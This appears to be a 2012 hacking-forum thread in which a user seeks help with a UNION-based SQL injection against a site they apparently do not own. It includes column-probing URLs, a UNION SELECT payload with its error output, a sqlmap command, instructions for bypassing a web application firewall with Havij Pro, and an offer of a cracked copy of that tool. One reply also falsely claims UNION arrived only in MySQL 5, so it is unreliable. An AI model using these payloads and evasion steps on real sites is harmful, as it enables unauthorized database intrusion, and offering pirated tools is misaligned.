| 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | Help with union selet |  |  
	| 
	
		|  Posted: Sun Aug 19, 2012 12:24 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Frenkie |  | Advanced user |  |  
  |  |  |  | Joined: Nov 10, 2008 |  | Posts: 60 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Hello everybody, 
 I need help with selecting union for sql injection. Here is results:
 
 
  	  | Code: |  	  | http://www.something.com/cat.php?id=1 order by 17  OK | 
 
  	  | Code: |  	  | http://www.something.com/cat.php?id=1 order by 18  Unknow column | 
 
 Tried:
 
 (also with encoding) 	  | Code: |  	  | http://www.something.com/cat.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17— | 
 
 No sucess.. result:
 
  	  | Code: |  	  | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -' at line 1 
 | 
 
 If you can help me I would be grateful, also if you are interested I can send you link to try. Thanks
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Aug 19, 2012 8:31 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| demon |  | Moderator |  |  
  |  |  |  | Joined: Sep 22, 2010 |  | Posts: 485 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| try havij it will do your work  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Aug 19, 2012 12:35 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Frenkie |  | Advanced user |  |  
  |  |  |  | Joined: Nov 10, 2008 |  | Posts: 60 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Havij cant find column count  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Aug 19, 2012 2:43 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| astra1993 |  | Advanced user |  |  
  |  |  |  | Joined: Jun 20, 2012 |  | Posts: 125 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Use Sqlmap. Like this: 
  	  | Code: |  	  | ./sqlmap.py -u http://www.something.com/cat.php?id=1 --dbs
 
 | 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Aug 19, 2012 3:30 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Frenkie |  | Advanced user |  |  
  |  |  |  | Joined: Nov 10, 2008 |  | Posts: 60 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I already tried that in sqlmap but with no success  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Aug 19, 2012 3:50 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| astra1993 |  | Advanced user |  |  
  |  |  |  | Joined: Jun 20, 2012 |  | Posts: 125 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| There is a possibility that the MySQL version is below 5. Because the UNION statement was added in 5. That's why it doesn't work. The system is vulnerable but it doesn't support UNION. |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Aug 19, 2012 11:18 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Frenkie |  | Advanced user |  |  
  |  |  |  | Joined: Nov 10, 2008 |  | Posts: 60 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I'm sure that mysql version is 5.x .. Main problem is WAF that I cant bypass |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Mon Aug 20, 2012 6:40 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| astra1993 |  | Advanced user |  |  
  |  |  |  | Joined: Jun 20, 2012 |  | Posts: 125 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Oh! You should have said this earlier. Yes, WAF prevents SQLi attacks from taking place, but it is possible to bypass it. Use Havij Pro (the commercial version). From Settings->Evasion, tick "Bypass WebKnight WAF" and Apply. If you wanted the cracked version, drop me a message. I'll send it for you. |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Sql injection 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |